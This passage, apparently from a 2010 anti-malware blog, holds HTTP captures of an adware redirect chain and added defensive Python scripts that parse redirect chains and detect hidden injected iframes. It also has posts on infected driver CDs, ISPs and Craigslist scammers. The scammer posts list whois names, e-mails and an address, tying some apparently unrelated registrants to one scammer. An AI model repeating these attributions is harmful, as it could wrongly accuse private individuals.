Set-Cookie: 1444-7742=DjgxrJMe3QMaX1NBqhfxXw%3D%3D%7CQgfBx9ZcykgOGWpwyrmnkeBgbipOtsFrYaedpvFSanrgJ5FPAujOl7YtiAhVd7i1nKjGR1w%2FG6LR1Iu1j74%2Fgw%3D%3D; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Set-Cookie: 1444-7742-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:28:49 GMT; path=/
Content-Length: 802
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

------------------------------------------------------------------
GET /dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: www.webfetti.com
Cookie: ltmcookie=2365676042.20480.0000; __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:28:53 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Language: en-GB
Content-Length: 5446
Connection: close
Content-Type: text/html;charset=UTF-8

------------------------------------------------------------------
GET /dl/toolbarDetect/toolbar.js HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
If-Modified-Since: Wed, 17 Feb 2010 19:46:07 GMT
If-None-Match: W/"35985-1266435967000"
Host: www.webfetti.com
Connection: Keep-Alive
Cookie: ltmcookie=2365676042.20480.0000; __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 304 Not Modified
Date: Thu, 18 Feb 2010 06:28:56 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Vary: Accept-Encoding

------------------------------------------------------------------
GET /dl/generateExternalObject.js HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
If-Modified-Since: Wed, 17 Feb 2010 19:46:07 GMT
If-None-Match: W/"7350-1266435967000"
Host: www.webfetti.com
Connection: Keep-Alive
Cookie: ltmcookie=2365676042.20480.0000; __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 304 Not Modified
Date: Thu, 18 Feb 2010 06:28:56 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Vary: Accept-Encoding

------------------------------------------------------------------
GET /http%253A%252F%252Fplugin%252Esmileycentral%252Ecom%252Fassetserver%252Fcursor%252Ejhtml%253Fcur%253D1%2526i%253D9646a/image.gif HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: plugin.smileycentral.com
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Thu, 18 Feb 2010 06:28:58 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.8
Location: http://plugin.smileycentral.com/assetserver/cursor.jhtml?cur=1&i=9646a
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
X-Pad: avoid browser bug

------------------------------------------------------------------
GET /__utm.gif?utmwv=6.1&utmn=1737558123&utmsr=1280x800&utmsc=32-bit&utmul=en-us&utmje=1&utmjv=1.3&utmfl=10.0&utmdt=Webfetti%20-%20Add%20FREE%20Customized%20Layouts%2C%20Generators%2C%20Graphics%20and%20Bling%20to%20Your%20Page%21&utmhn=www.webfetti.com&utmr=-&utmp=/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0 HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: utm.trk.webfetti.com
Connection: Keep-Alive
Cookie: __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:28:58 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Cache-control: no-store
Expires: -1
Last-Modified: Tue, 10 Feb 2009 19:06:12 GMT
ETag: "b4221-23-4991d024"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: image/gif

------------------------------------------------------------------
GET /assetserver/cursor.jhtml?cur=1&i=9646a HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: plugin.smileycentral.com
Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily
Date: Thu, 18 Feb 2010 06:29:01 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.8
Vary: Accept-Encoding
Location: http://i1img.com/images/cursormania/files/19/9646a.ani
Content-Language: en-GB
Content-Length: 0
Connection: close
Content-Type: text/html;charset=UTF-8

------------------------------------------------------------------
GET /__utm.gif?utmwv=6.1&utmn=614745390&utmsr=1280x800&utmsc=32-bit&utmul=en-us&utmje=1&utmjv=1.3&utmfl=10.0&utmdt=Webfetti%20-%20Add%20FREE%20Customized%20Layouts%2C%20Generators%2C%20Graphics%20and%20Bling%20to%20Your%20Page%21&utmhn=www.webfetti.com&utmp=/clicks/splash/partner/ZKxdm194YYGB HTTP/1.1
Accept: */*
Referer: http://www.webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Host: utm.trk.webfetti.com
Connection: Keep-Alive
Cookie: __utma=87938462.236408141.1266455021.1266455021.1266473839.2; __utmc=87938462; __utmz=87938462.1266455021.1.1.utmcsr=ZKxdm194|utmccn=(not+set)|utmcmd=(not+set); __utmb=87938462

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:29:01 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Cache-control: no-store
Expires: -1
Last-Modified: Tue, 10 Feb 2009 19:06:12 GMT
ETag: "b4221-23-4991d024"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: image/gif

------------------------------------------------------------------


short.strange-company.info resolves to an IP at GoDaddy (72.167.42.140), as does strange-company.info (68.178.232.100). Both are shared servers; worse, of course, is that we already know how lax GoDaddy are when it comes to dealing with abuse. All of the domains referenced in the headers are owned by IAC, so feel free to blackhole the lot of them (personally, I've got their IP ranges blackholed, but that's just me).
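The chain above can be pulled out of a saved header capture mechanically rather than by eye. The script below is an added example, not code from the original post: it reads a capture in the same layout as the dumps above (request, blank line, response, dashed separator), rebuilds the hop list from the request line, Host and Location headers, notes where a hop was not reached via a Location header at all (fbgdc.com answered 200 with an 802-byte body, so the jump to webfetti.com was driven by page content rather than a header redirect), and base64-decodes the nbCode parameter on the final URL. The embedded CAPTURE is a trimmed copy of the second advert's headers. The meaning attached to the decoded fields is an inference from the cookie names fbgdc.com sets in the same capture (encoded_click, affiliate_id, site_id, subid), not documentation from any of those sites.

```python
"""Rebuild a redirect chain from a saved HTTP header capture and decode the
affiliate tracking parameter carried on the last hop.

Added example, not code from the original post. CAPTURE is a trimmed copy of
the second advert's request/response pairs, in the same layout as the dumps
in the post (request, blank line, response, dashed separator).
"""
import base64
import re
from urllib.parse import parse_qs, urlsplit

CAPTURE = """\
GET /click/?s=12064&c=196741 HTTP/1.1
Host: npvos.com
Referer: http://short.strange-company.info/happy/27851

HTTP/1.1 302 Found
Location: http://fbgdc.com/click/?s=12064&c=196741&internal=U_136o6o_1
Content-Length: 0

------------------------------------------------------------------
GET /click/?s=12064&c=196741&internal=U_136o6o_1 HTTP/1.1
Host: fbgdc.com

HTTP/1.1 200 OK
Content-Length: 802

------------------------------------------------------------------
GET /dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjE2Ml90b18xNDQ0 HTTP/1.1
Host: www.webfetti.com

HTTP/1.1 200 OK
Content-Length: 5446

------------------------------------------------------------------
"""

SEPARATOR = re.compile(r"^-{10,}$", re.M)
REQUEST_LINE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]$", re.M)
STATUS_LINE = re.compile(r"^HTTP/1\.[01] (\d{3})", re.M)


def header(block, name):
    """Value of the first `name:` header in a request/response block, or None."""
    m = re.search(r"^%s:[ \t]*(.+?)[ \t]*$" % re.escape(name), block, re.M | re.I)
    return m.group(1) if m else None


def parse_hops(capture):
    """Each separator-delimited block becomes (request URL, status code, Location or None)."""
    hops = []
    for block in SEPARATOR.split(capture):
        req, status = REQUEST_LINE.search(block), STATUS_LINE.search(block)
        if not (req and status):
            continue  # separator residue, or a block with no response
        url = f"http://{header(block, 'Host')}{req.group(2)}"
        hops.append((url, int(status.group(1)), header(block, "Location")))
    return hops


def annotate_chain(hops):
    """Say how each hop was reached: the previous hop's Location header, or not via
    a header at all (the previous response was a 200 whose body did the work)."""
    chain, prev = [], None
    for url, status, location in hops:
        if prev is None:
            how = "entry point"
        elif prev[2] == url:
            how = f"Location header from {urlsplit(prev[0]).hostname}"
        elif 300 <= prev[1] < 400:
            how = f"MISMATCH: previous Location was {prev[2]}"
        else:
            how = f"not a header redirect (previous response {prev[1]}); driven by page content"
        chain.append((url, status, how))
        prev = (url, status, location)
    return chain


def decode_nbcode(url):
    """Base64-decode the nbCode query parameter and split it into its ':'-separated fields."""
    value = parse_qs(urlsplit(url).query)["nbCode"][0]
    value += "=" * (-len(value) % 4)  # restore any padding stripped for the URL
    return base64.b64decode(value).decode("ascii").split(":")


if __name__ == "__main__":
    hops = parse_hops(CAPTURE)
    for url, status, how in annotate_chain(hops):
        print(f"{status} {url}\n      <- {how}")
    print("nbCode fields:", decode_nbcode(hops[-1][0]))
```

Run against the capture, the decoded nbCode reads `:2:GB:HDYls521-:31826:12064:redirect_from_6162_to_1444`, which lines up field for field with the `1444-encoded_click`, `1444-affiliate_id`, `1444-site_id` and `1444-subid` cookies in the fbgdc.com request above; the only difference is that the cookie still carries `redirect_from_6471_to_1444` from the first advert, while this advert's nbCode says 6162. Feed it a capture with an intervening hop missing and the MISMATCH annotation tells you where the chain was cut.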

Batman joins Sunbelt!

Some extremely great news just dropped into my RSS reader - Paperghost, aka Chris Boyd, has now joined Sunbelt's research team.

Sunbelt now have, without a doubt, the best damn researcher in the world. Congrats Chris!

Read more over at the Sunbelt blog;

http://sunbeltblog.blogspot.com/2010/02/uk-researcher-joins-sunbelt.html

Tuesday, 16 February 2010

hpHOSTS - UPDATED February 17th, 2010

The hpHOSTS Hosts file has been updated. There is now a total of 121,497 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 17/02/2010 05:00
  2. Last Verified: 16/02/2010 23:00

Download hpHosts now!
http://hosts-file.net/?s=Download

Alert: Infected Drivers CD?

Here's some news from the ESET Virus Lab in Slovakia. One of our clients encountered an interesting infection within his network.

The problem seemed to originate from the drivers CD that comes with the device he bought, the Habey BIS-6550HD, a fanless Atom-powered system, though we haven't seen the CD itself. Our analysis of the CD image supplied by the customer, which seems to date from July 2009, confirmed that it contains a set of files infected by 2 different viruses:
  1. Win32/Viking.CH
  2. Win32/Xorer.NAJ
Altogether, 25 executables were infected. Furthermore, 15 HTM files were infected (detected by us as Win32/Xorer.AW) by the insertion of an IFRAME redirect, originating with infection by the Xorer virus.

Both of these infiltrations are prepending viruses. Win32/Xorer is also classified as an Autorun worm. Both are described in our virus encyclopaedia, though the descriptions don't refer to the exact same variants: one describes Win32/Viking.AU and the other describes Win32/Xorer.BU.


Read more
http://www.eset.com/threat-center/blog/2010/02/16/infected-drivers-cd
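Detection note, added here as an example rather than anything from ESET or the original post: the IFRAME insertion ESET describes is the kind of thing you can triage across a drivers CD's HTM files with a cheap heuristic scan before any of them reach a browser. The script below flags <iframe> tags that are sized to be invisible, hidden via CSS, or that point at a host the page has no reason to load from. The sample pages and host names are constructed (the .invalid TLD is reserved and never resolves); they do not reproduce any actual Xorer payload, and the allow-list is whatever hosts you decide are legitimate for the CD in hand.

```python
"""Triage .htm files for injected IFRAME redirects of the kind ESET describes.

Added example, not ESET's tooling or the original post's code. SAMPLE_FILES is
constructed and does not reproduce any real Xorer payload; the hosts it names
are assumptions that never resolve (.invalid is reserved).
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample pages, file name -> content. index.htm is clean,
# setup.htm carries a zero-size frame, faq.htm a CSS-hidden one.
SAMPLE_FILES = {
    "index.htm": '<html><body><h1>Driver CD</h1>'
                 '<iframe src="help/readme.htm" width="600" height="400"></iframe></body></html>',
    "setup.htm": '<html><body>Setup<iframe src="http://counter.example.invalid/stat.htm" '
                 'width="0" height="0" frameborder="0"></iframe></body></html>',
    "faq.htm": '<html><body>FAQ<iframe src="http://ads.example.invalid/a.php" '
               'style="display: none"></iframe></body></html>',
}

HIDDEN_STYLE_MARKERS = ("display:none", "visibility:hidden")


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def is_tiny(value):
    """True for width/height values meant to make the frame invisible (0 or 1 px)."""
    digits = value.strip().rstrip("px").strip()
    return digits.isdigit() and int(digits) <= 1


def suspicious_iframes(html, allowed_hosts=()):
    """Return [(src, [reasons])] for iframes that are hidden or load from an unexpected host."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src, reasons = attrs.get("src", ""), []
        if is_tiny(attrs.get("width", "")) and is_tiny(attrs.get("height", "")):
            reasons.append("zero-size frame")
        style = attrs.get("style", "").replace(" ", "").lower()
        if any(marker in style for marker in HIDDEN_STYLE_MARKERS):
            reasons.append("hidden via CSS")
        host = urlsplit(src).hostname  # None for relative paths such as help/readme.htm
        if host and host not in allowed_hosts:
            reasons.append(f"external host {host}")
        if reasons:
            findings.append((src, reasons))
    return findings


def scan(files, allowed_hosts=()):
    """Map file name -> suspicious iframes; clean files are left out of the report."""
    report = {}
    for name, content in files.items():
        hits = suspicious_iframes(content, allowed_hosts)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, hits in scan(SAMPLE_FILES).items():
        for src, reasons in hits:
            print(f"{name}: {src}  [{', '.join(reasons)}]")
```

Point it at a directory of .htm files read from the CD image and review anything it reports; a hit on a host you have since allow-listed drops the "external host" reason but keeps the sizing and CSS ones, which is the combination that matters for an injected redirect.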

Thursday, 11 February 2010

hpHosts/vURL Back online

The switch over has been made, tested and the gateway is now back online, so access to hpHosts, vURL etc, has been restored.

hpHosts/vURL 5 minute break

Just a note, due to Windows updates and a hardware replacement, the network gateway will be down for a few moments (basically to allow for the hardware to be replaced, and the Windows updates to be installed).

As an aside, when hpHosts does come back online, I re-enabled the browsing facility yesterday, and there's also both a new updates RSS feed, and a new MMT (Misleading Marketing Tactics) classification (FSA has now been split into FSA and MMT).

Sunday, 7 February 2010

Dear Netgear: Fire the script monkey please .....

I thought I'd treat myself to a router upgrade, given the current one (DG834Gv2) was struggling with the traffic on the network, and opted for the DGN2000 (would've loved a newer and better one, but this one cost £94, the rest were over £150). Configuring it for the network took a couple of seconds, which was great as I needed it done asap, and switching the old to the new took milliseconds (well, all you have to do is unplug a couple of cables, then plug 'em into the new one).

Alas, this is where the problems started. Checking the connectivity showed external access to the internal servers worked fantastically, and external access to the likes of Google worked perfectly - but - LAN access to the servers via hostname didn't work. I double, triple and quadruple checked the configs and connections, to make sure I'd not missed anything - I hadn't.

I decided to phone Netgear to find out what the problem was, and boy did I wish I hadn't. The first bloke I spoke to asked me to check port forwarding, create a manual service for ports 443-447, and a whole world of other useless stuffage. He then finally decided to tell me "sorry, this router does not support it" (referring to the LAN access to the servers) - what utter bollocks. Advising him he was talking rubbish, I asked to speak to a supervisor; this took yet another 15-20 mins. Finally getting to talk to a manager/supervisor (and I doubt he actually was, as he was just as useless), he had me go through the same rubbish again, before finally telling me yet again that the router quite simply did not support connecting to the internal servers from the LAN via their hostname (err, yeah).

I told him my DG834Gv2 worked perfectly, and all routers with port forwarding supported this, so he was talking rubbish. He put me on hold.

Whilst on hold, I decided to see if there was a firmware upgrade I could try - there was (router comes with v1.1.1). Still on hold, I upgraded the routers firmware to v1.1.8, rebooted the router and voila - everything was working perfectly.

He finally took me off hold and said the router didn't support it, and he pointed me to the "work around";

http://kb.netgear.com/app/answers/detail/a_id/8485/kw/unable%20to%20access%20my%20web%20server%20via%20host%20name/r_id/100109

Asking if he was joking, he said no (so let me get this straight, to access the internal servers via their hostname, I've got to modify my HOSTS file???? errr, yeah).

Cutting a long and boring story short, I told him he was talking absolute nonsense (didn't use those exact words but you get the drift), and how did I know that? BECAUSE I'D FIXED IT WHILST ON HOLD!!! (he asked how and I told him, which apparently surprised him, "we weren't told that" he muttered).

To get to the point, I'd like to inform Netgear, if you're going to hire script monkeys, at least make sure those monkeys actually know what they're talking about, and aren't simply following the script!!! (scripts are great for simpleton stuff such as the ever increasing use of "have you restarted the computer" (I always laugh when I hear that), but they're useless for stuffage that actually requires knowledge!).

I'd actually looked for the firmware upgrade before calling them, but since the update notes didn't mention a fix for the problem I was experiencing, I didn't bother with it - wished I had done once I noticed it actually did fix the problem.

Friday, 5 February 2010

Crimeware friendly ISPs: COGENT /PSI (AS174)

It was a difficult choice deciding who should be in the firing line next, as far as being cybercrime friendly, as there's a multitude of choices, those I've not yet covered include VPLSNET (VPLS Inc. d/b/a Krypt Technologies), Masterhost, China (I'd be here all year with this one), Aruba (and if you're reading this Aruba - FIX YOUR DAMN ABUSE ADDRESS!), Peterhost, to name a few.

I thought I'd focus on yet another ISP that's continuing to provide connectivity to a 100% malicious ISP (root eSolutions in case you're wondering). This left me with three choices, COGENT /PSI, RUNNET or Hurricane Electric (all three have legit clients, as well as malicious ones); I decided to opt for COGENT /PSI (AS174).

COGENT have a plethora of legit clients, amongst them my ISP (Plusnet PLC), and to be fair, there's very little malicious activity on their own network (though there's likely a lot more, I've only recorded 231 cases since July 2009), but they're continuing to provide connectivity to malicious ISPs such as Netelligent and root eSolutions et al, regardless of the fact there's been a flood of reports published on them. One has to wonder why this is; my guess is money (but I'm a skeptic).

It gets worse however, as COGENT are also one of two ISPs that are providing connectivity to the much despised Phorm (AS48214). A company that's been in the news on more than one occasion for specializing in illegal (Ref: 1, 2, 3 etc) and malicious (namely, spyware via DPI (Deep Packet Inspection) and connection hijacking) behaviour.

It is this, and this alone, that has earnt them the title of crimeware friendly. Had they not put up with this, and de-peered these "ISPs" (and I use the term ISP loosely as far as they're concerned) as soon as this started, which is what they should have done (there's certainly plenty of evidence against their clients available), I'd have gone with RUNNET instead (RUNNET are also providing connectivity not only to root eSolutions, but to two other 100% malicious ISP ranges - KABELFOON (aka WorldStream)* and CARAVAN, and not forgetting of course, MASTERHOST; I'll be covering these in a later article), but alas, nope.

* Just to clarify, Hurricane Electric are also providing connectivity to KABELFOON/WorldStream

To make matters worse, they've also not given Lunarpages a swift kick in the behind yet (remember them?). A kick that was deserved a very long time ago, and in my opinion, is still something they deserve (sorry guys, but your grip on security is about as good as Mr Bean's, and you're about as quick at taking action on abuse/hacked site reports as Google).

Something I am a little curious about however, is why COGENT /PSI's *clients* haven't forced them to take action. You'd have thought legit ISPs would want to ensure there were no connections to malicious activity; I suppose this is a question that will be left unanswered.

/update 10-02-2010 - Corrected typo

Wednesday, 3 February 2010

Happy birthday ZeusTracker!

One year ago, on the 2nd of February 2009, ZeuS Tracker was born (Introducing: abuse.ch ZeuS Tracker BETA). Today ZeuS Tracker looks back to a very successful year and I would like to use this event to write some words about ZeuS Tracker.

During the last year, ZeuS Tracker has tracked more than 2′800 malicious ZeuS C&C servers. The ZeuS Tracker has captured more than 360MB ZeuS config files and 330MB binaries.

First of all let me say that the success story of ZeuS Tracker was made possible by you. You, the readers of my blog as well as the contributors of ZeuS Tracker, are the heroes. Your effort, your advertising by word-of-mouth, your submission of new (unknown) ZeuS C&C servers to ZeuS Tracker, your support, this is what allowed ZeuS Tracker to gain so much attention and success. During this year, I've received hundreds of emails with constructive feedback, questions and offers by people who wanted to contribute their work. Thank you!


Read more
http://www.abuse.ch/?p=2363

Hat tip to SysAdMini for the heads up

Tuesday, 2 February 2010

hpHosts server issues

You may have noticed over the past few days, that access to the hpHosts website has been sporadic at best. I just wanted to let you all know, although annoyed as hell, I do have a good excuse, well three actually;

1. MySQL is being an absolute PITA
2. Several IPs from one of NetDirekt's ranges have been hammering the vURL server, which accesses hpHosts (I've temporarily disabled vURL's access to hpHosts whilst I sort this out)
3. A few HostsMan users are hammering the server yet again

I'm working on sorting it out to prevent these issues.

Monday, 1 February 2010

Update: Craigslist scammers - the domains

The validation and WhoIs hunt is completed, and although I've no doubt there are more domains owned by this person than those I've found, the following are those that are, or have been, owned by Melissa/Bob/Jeremy, whatever he/she wants to call him/herself.

Note: It's entirely possible that some of these are now legit, as quite a few on this list were obtained from a dated (08-30-2009) list

First, the simple validation. The following contains only those still resolving;

http://hosts-file.net/misc/hpObserver_results_-_Craigslist_scammer_domains.html

And now, complete with WhoIs information (name/e-mail only)

1910.com    >    74.117.116.65    >    74-117-116-65.parked.com        soly perlstein / solperlstein@gmail.com
1af.info    >    216.8.179.23    >    ptr-216-8-179-23.ptr.nextdimensioninc.com        Rubalier / cvx.conts@gmail.com
1af.org    >    68.178.232.100    >    parkwebwin-v01.prod.mesa1.secureserver.net        Michael Shields / michaelw33@hotmail.com
3m0.net    >    84.51.38.15    >    us.isimtescil.net        Nazim Ozkurt / mc.bakteri@hotmail.com
4r0.com    >    82.98.86.166    >    www166.sedoparking.com        Paul Fisher / pfdl01305@blueyonder.co.uk
6oe.net    >    38.117.90.45    >    Failed resolution        Whois not available at present
ajt.info    >    82.98.86.170    >    www170.sedoparking.com        Frank Becker / becker@agentur.biz
blogspammers.com    >    208.73.210.27    >    parkinglot.information.com        Admin / admin@overseedomainmanagement.com
busstations.net    >    74.117.116.120    >    74-117-116-120.parked.com        solomon perlstein / solomon@synergycr.com
cancersupport.info    >    174.120.21.253    >    fd.15.78ae.static.theplanet.com        Melissa Pechanec / justwannabeme44@gmail.com
customsportscars.net    >    64.95.64.198    >    lander.sitesense-oo.com        Rarenames, Inc. / brokerage@buydomains.com
degrades.net    >    216.150.214.58    >    v10.verocity.net        HugeDomains / [REMOVED]
dies.tv    >    174.120.21.252    >    fc.15.78ae.static.theplanet.com        Law, Michael / mikerlaw@gmail.com
dnposition.com    >    174.120.21.250    >    fa.15.78ae.static.theplanet.com        Bob Smith / cupamojoe@gmail.com
dnregistar.com    >    174.120.21.252    >    fc.15.78ae.static.theplanet.com        Bob Smith / cupamojoe@gmail.com
dnregistrarfinder.com    >    174.120.21.254    >    fe.15.78ae.static.theplanet.com        Bob Smith / cupamojoe@gmail.com
dnregistraronline.com    >    174.120.21.254    >    fe.15.78ae.static.theplanet.com        Bob Smith / cupamojoe@gmail.com

Finally, the complete list, inclusive of those no longer resolving;


References:

Update: Craigslist phishing domains down
http://hphosts.blogspot.com/2010/02/update-craigslist-phishing-domains-down.html

Craigs List: Allow me to beat you over the head (softly of course)
http://hphosts.blogspot.com/2010/01/craigs-list-allow-me-to-beat-you-over.html

Update: Craigslist phishing domains down

I'm happy to report that I've just been advised by Jeremy Zawodny at Craigslist that the following two domains have now been taken offline;

craigslistinc.org
craigslistmarketing.org

Sadly, dnblocker.com is still online and, hilariously, has tried changing the WhoIs information to "Bob Smith" in a poor attempt to hide .....

Registrant:
Bob Smith
343 Mumby Road
Gosport, Hampshire PO12 1AQ
United Kingdom

Administrative Contact:
Bob Smith
343 Mumby Road
Gosport, Hampshire PO12 1AQ
United Kingdom
cupamojo@gmail.com
+1 2064265824


Doesn't really work now, does it ....

The e-mail address now associated with dnblocker is apparently associated with 3 other domains. I'm working on getting the list, but in the meantime;

craigslistadverification.com (registered, no website)
dnregistraronline.com (hosted at 174.120.21.254)
dnregistrarsite.com (hosted at 174.120.21.254)
dnregistrarfinder.com (hosted at 174.120.21.254)
affiliatesbeingrated.com (hosted at 174.120.21.252)

I've got a whole list of other domains known to be, or to have been, owned by this person, and will publish the results once complete.
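The pivot the post does by hand (linking domains through a shared registrant e-mail, or a shared hosting IP) can be automated over the "domain > IP > reverse DNS    registrant / e-mail" listing format used on this page. The following is an added example, not code from hpHosts; it assumes that layout, with at least two spaces separating the reverse-DNS column from the registrant column, and the sample lines are copied from entries on this page.

```python
import re
from collections import defaultdict

# Constructed sample in the same "domain > IP > reverse DNS    registrant / e-mail"
# layout as the listing on this page; every entry is copied from the page.
SAMPLE = """\
dnregistrarsite.com > 174.120.21.254 > fe.15.78ae.static.theplanet.com    Bob Smith / cupamojoe@gmail.com
i7j.net > 174.120.21.254 > fe.15.78ae.static.theplanet.com    melissa walker / justwannabeme44@gmail.com
insurancelink.net > 68.178.232.99 > parkwebwin-v02.prod.mesa1.secureserver.net    Melissa Pechanec / justwannabeme44@gmail.com
tobaccosmoke.info > 68.178.232.100 > parkwebwin-v01.prod.mesa1.secureserver.net    Melissa Walker / justwannabeme44@gmail.com
thednsite.com > 174.120.21.252 > fc.15.78ae.static.theplanet.com    Bob Smith / cupamojoe@gmail.com
programming.name > 58.123.163.90 > Failed resolution    Whois unavailable
"""

# Three ">"-separated fields, then a run of whitespace before the registrant column.
LINE_RE = re.compile(
    r"^(?P<domain>\S+)\s*>\s*(?P<ip>\S+)\s*>\s*(?P<rdns>.*?)\s{2,}(?P<contact>.+)$"
)
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

def parse_records(text):
    """Parse listing lines into dicts; email is None when whois gave none."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # blank or malformed line
        email = EMAIL_RE.search(m.group("contact"))
        records.append({
            "domain": m.group("domain").lower(),
            "ip": m.group("ip"),
            "rdns": m.group("rdns"),
            "email": email.group(0).lower() if email else None,
        })
    return records

def cluster(records, key):
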